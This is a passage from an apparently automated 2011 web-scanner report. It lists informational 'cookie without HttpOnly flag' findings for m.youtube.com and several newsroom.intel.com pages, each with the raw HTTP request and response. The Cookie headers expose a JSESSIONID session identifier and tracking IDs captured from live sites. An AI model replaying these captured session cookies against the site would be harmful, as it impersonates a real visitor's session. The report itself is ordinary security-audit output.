  • VISITOR_INFO1_LIVE=cCy2OmNz5kY; path=/; domain=.youtube.com; expires=Mon, 03-Oct-2011 23:21:27 GMT
  • GEO=3216092b72f09a7334fb8e5b55f6c77fcwsAAAAzVVOtwdbzTU3bdw==; path=/; domain=.youtube.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /details?v=i73f0pQBfQ8 HTTP/1.1
Host: m.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Sat, 05 Feb 2011 23:21:27 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: VISITOR_INFO1_LIVE=cCy2OmNz5kY; path=/; domain=.youtube.com; expires=Mon, 03-Oct-2011 23:21:27 GMT
Set-Cookie: GEO=3216092b72f09a7334fb8e5b55f6c77fcwsAAAAzVVOtwdbzTU3bdw==; path=/; domain=.youtube.com
Set-Cookie: NO_MOBILE=; path=/; domain=.youtube.com; expires=Thu, 01-Jan-1970 00:00:00 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Content-Length: 0
Cache-Control: no-cache
Location: http://m.youtube.com/watch?v=i73f0pQBfQ8
Content-Type: text/html; charset=utf-8
Connection: close


12.125. http://newsroom.intel.com/community/de_de  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/de_de

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936303b33382c313935393b33382c313538363b33382c313931393b33382c313934363b33382c313936333b31342c323030343b31342c323032353b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:34 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/de_de HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:32 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936303b33382c313935393b33382c313538363b33382c313931393b33382c313934363b33382c313936333b31342c323030343b31342c323032353b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:34 GMT; Path=/
X-JAL: 157
Content-Language: en-US
CacheHit: D=185783 t=1296947672341771
X-JSL: D=185788 t=1296947672341771
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.126. http://newsroom.intel.com/community/en_eu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/en_eu/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313931393b33382c313538363b33382c313936303b33382c313935393b33382c313934363b33382c313936333b31342c323031303b31342c323031313b31342c323032353b31342c323031363b31342c323030343b31342c323030353b; Expires=Mon, 07-Mar-2011 23:14:38 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/en_eu/ HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:35 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313931393b33382c313538363b33382c313936303b33382c313935393b33382c313934363b33382c313936333b31342c323031303b31342c323031313b31342c323032353b31342c323031363b31342c323030343b31342c323030353b; Expires=Mon, 07-Mar-2011 23:14:38 GMT; Path=/
X-JAL: 552
Content-Language: en-US
CacheHit: D=562460 t=1296947675935267
X-JSL: D=562466 t=1296947675935267
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.127. http://newsroom.intel.com/community/en_ie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/en_ie

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313936303b33382c313931393b33382c313935393b33382c313934363b33382c313936333b31342c323030353b31342c323032353b31342c323031363b31342c323030343b31342c323031303b; Expires=Mon, 07-Mar-2011 23:14:37 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/en_ie HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:35 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313936303b33382c313931393b33382c313935393b33382c313934363b33382c313936333b31342c323030353b31342c323032353b31342c323031363b31342c323030343b31342c323031303b; Expires=Mon, 07-Mar-2011 23:14:37 GMT; Path=/
X-JAL: 170
Content-Language: en-US
CacheHit: D=180106 t=1296947675858488
X-JSL: D=180112 t=1296947675858488
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.128. http://newsroom.intel.com/community/en_uk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/en_uk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936303b33382c313931393b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323030373b31342c323030363b31342c323031363b31342c323031313b31342c323031303b31342c323032353b31342c323030343b31342c323030353b; Expires=Mon, 07-Mar-2011 23:14:39 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/en_uk HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:37 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936303b33382c313931393b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323030373b31342c323030363b31342c323031363b31342c323031313b31342c323031303b31342c323032353b31342c323030343b31342c323030353b; Expires=Mon, 07-Mar-2011 23:14:39 GMT; Path=/
X-JAL: 245
Content-Language: en-US
CacheHit: D=263295 t=1296947677873574
X-JSL: D=263300 t=1296947677873574
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.129. http://newsroom.intel.com/community/en_za/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/en_za/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936303b33382c313931393b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031313b31342c323031363b31342c323030373b31342c323031303b31342c323032353b31342c323030343b31342c323030353b; Expires=Mon, 07-Mar-2011 23:14:38 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/en_za/ HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:37 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936303b33382c313931393b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031313b31342c323031363b31342c323030373b31342c323031303b31342c323032353b31342c323030343b31342c323030353b; Expires=Mon, 07-Mar-2011 23:14:38 GMT; Path=/
X-JAL: 151
Content-Language: en-US
CacheHit: D=159108 t=1296947677046883
X-JSL: D=159113 t=1296947677046883
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.130. http://newsroom.intel.com/community/es_es  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/es_es

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313931393b33382c313936303b33382c313935393b33382c313934363b33382c313936333b31342c323030363b31342c323032373b31342c323031363b31342c323030343b31342c323030373b31342c323031313b31342c323031303b31342c323032353b31342c323030353b; Expires=Mon, 07-Mar-2011 23:14:40 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/es_es HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:38 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313931393b33382c313936303b33382c313935393b33382c313934363b33382c313936333b31342c323030363b31342c323032373b31342c323031363b31342c323030343b31342c323030373b31342c323031313b31342c323031303b31342c323032353b31342c323030353b; Expires=Mon, 07-Mar-2011 23:14:40 GMT; Path=/
X-JAL: 227
Content-Language: en-US
CacheHit: D=241142 t=1296947678563509
X-JSL: D=241148 t=1296947678563509
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.131. http://newsroom.intel.com/community/intel_newsroom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313934363b33382c313936303b33382c313935393b33382c313936333b33382c313931393b33382c313538363b31342c323031363b31342c323032353b; Expires=Mon, 07-Mar-2011 23:14:25 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/intel_newsroom?view=tags&tags=2nd_generation_core&recursive=false HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:23 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313934363b33382c313936303b33382c313935393b33382c313936333b33382c313931393b33382c313538363b31342c323031363b31342c323032353b; Expires=Mon, 07-Mar-2011 23:14:25 GMT; Path=/
X-JAL: 179
Content-Language: en-US
CacheHit: D=190363 t=1296947663359176
X-JSL: D=190368 t=1296947663359176
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...

12.132. http://newsroom.intel.com/community/intel_newsroom/blog/2010/10/19/intel-announces-multi-billion-dollar-investment-in-next-generation-manufacturing-in-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/blog/2010/10/19/intel-announces-multi-billion-dollar-investment-in-next-generation-manufacturing-in-us

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313934363b33382c313936333b33382c313936303b33382c313935393b33382c313931393b31342c323032353b31342c323031363b; Expires=Mon, 07-Mar-2011 23:14:19 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/intel_newsroom/blog/2010/10/19/intel-announces-multi-billion-dollar-investment-in-next-generation-manufacturing-in-us HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
